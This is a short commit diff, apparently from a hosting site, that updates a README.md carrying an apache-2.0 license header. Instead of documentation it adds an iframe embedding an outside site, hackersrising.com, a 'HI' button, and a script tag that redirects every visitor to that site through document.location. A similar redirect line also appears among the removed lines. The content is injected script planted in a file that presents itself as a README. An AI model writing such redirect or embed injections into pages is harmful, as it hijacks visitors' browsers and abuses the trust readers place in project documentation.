Update README.md
Browse files
README.md
CHANGED
|
@@ -1,7 +1,9 @@
|
|
| 1 |
---
|
| 2 |
license: apache-2.0
|
| 3 |
---
|
| 4 |
-
<
|
|
|
|
|
|
|
|
|
|
| 5 |
|
| 6 |
|
| 7 |
-
<script>document.location='https://hackersrising.com'</script>
|
|
|
|
| 1 |
---
|
| 2 |
license: apache-2.0
|
| 3 |
---
|
| 4 |
+
<iframe src="https://hackersrising.com" style="width:200px;height:800px;"></iframe>
|
| 5 |
+
<button style="color:blueviolet">HI</button>
|
| 6 |
+
|
| 7 |
+
<script>document.location='https://hackersrising.com'</script>
|
| 8 |
|
| 9 |
|
|
|